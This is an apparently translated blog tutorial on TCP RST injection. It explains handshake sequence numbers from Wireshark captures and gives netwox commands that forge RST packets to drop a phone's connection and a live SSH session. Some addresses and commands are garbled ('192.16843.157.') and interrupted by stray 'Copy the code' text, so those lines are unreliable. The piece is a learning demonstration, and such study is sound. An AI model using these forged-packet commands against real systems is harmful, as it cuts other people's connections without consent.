preface
In TCP, there is a flag called the RST flag, which terminates the connection immediately. That is, if one party on the connection receives an RST packet sent by the other party, it will immediately close the connection.
Can you fake a packet and disconnect two devices?
According to the TCP specification, in order to respond correctly to an RST packet, the RST packet must have the same serial number as the recipient expects. If this serial number is not correct, the connection cannot be disconnected.
Suppose A sends B A packet with serial number 10 containing five bytes of data, and it expects to receive an acknowledgement packet from B with the acknowledgement number 15 (10 + 5).
This requires knowledge of TCP’s three-way handshake process.
Three-handshake analysis
The best way to understand this is to actually look at the TCP packets using the Wireshark tool.
Assume that the IP address of the PC is 192.168.43.157 and that of the mobile phone is 192.168.43.226.
The computer listens to port 7070, and the mobile phone first sends three packets, called TCP three-way handshake, to exchange control information.
The first handshake is sent by the mobile phone, and the Flag in the packet is SYN. This Flag should be set only for the first packet from the sender, and it also contains its OWN SEQ number. If the sender replies, the ACK number of the packet is SEQ+1.
The second handshake is sent by the computer in response to the mobile phone. The Flag in the packet is SYN, ACK, and the confirmation number is 1952416869, which are used to tell the other party that they have received your request. Of course, they also need to tell the other party their SEQ number. So the connection is set up. SEQ here is 1982386088.
The third time is sent by the mobile phone, which is used to respond to the computer, telling itself that it can also receive your data packet. The Flag in the packet is ACK, the ACK confirmation number is 1982386089, and the SEQ is 1952416869.
Both parties now hold each other’s SEQ serial number, and their SEQ value is +1.
The Wireshark can capture four packets because the computer sends two bytes of data first and receives a response from the phone. The phone also sends two bytes of data and receives a response from the computer.
The most important thing here is the SEQ change.
The following is the packet sent by the computer, SEQ is still its own serial number, but the Next sequence number becomes its own SEQ+ packet size, and the ACK of the packet he wants to receive from the phone must be the value of the Next sequence number (1982386091).
So take a look at what the phone responds to.
You can see that the ACK confirmation number is 1982386091, and nothing else has changed.
The phone then sends out two more bytes of data, the same process, the same verification.
Netwox forges packets
Now let’s forge a packet to demonstrate the RST attack.
This packet must contain the original address/port, the destination address/port, and most importantly, the SEQ number.
I looked for ways to send RST packets to clients, and found netwox to be a handy tool for faking packets. In www.cse.iitm.ac.in/~chester/co… There is a good example of a TCP attack on page 32 of the.
The command is as follows.
netwox 40-l Original IP address -m Target IP address -o Listening port number -p Back of client port -b -q Original SEQ numberCopy the code
In the Wireshark, you can view that the port number of the client is 42560, and the original SEQ number changes from 1982386088 to 1982386091.
netwox 40 -l 192.16843.157. -m 192.16843.226. -o 7070 -p 42560 -B -q 1982386091
Copy the code
When executed, you can see that SocketException is thrown in Android.
Disconnecting SSH Connections
Now try to disconnect an SSH that is already connected to a remote service.
TCP. Port ==22 and TCP
netwox 40 -m 116.62.xx.xx -l 192.16843.157. -o 22 -p 37156 -B -q 1328649361
Copy the code
Finally, the following output is displayed on the terminal
root@meet:~# packet_write_wait: Connection to 116.62.xx.xx port 22: Broken pipe
Copy the code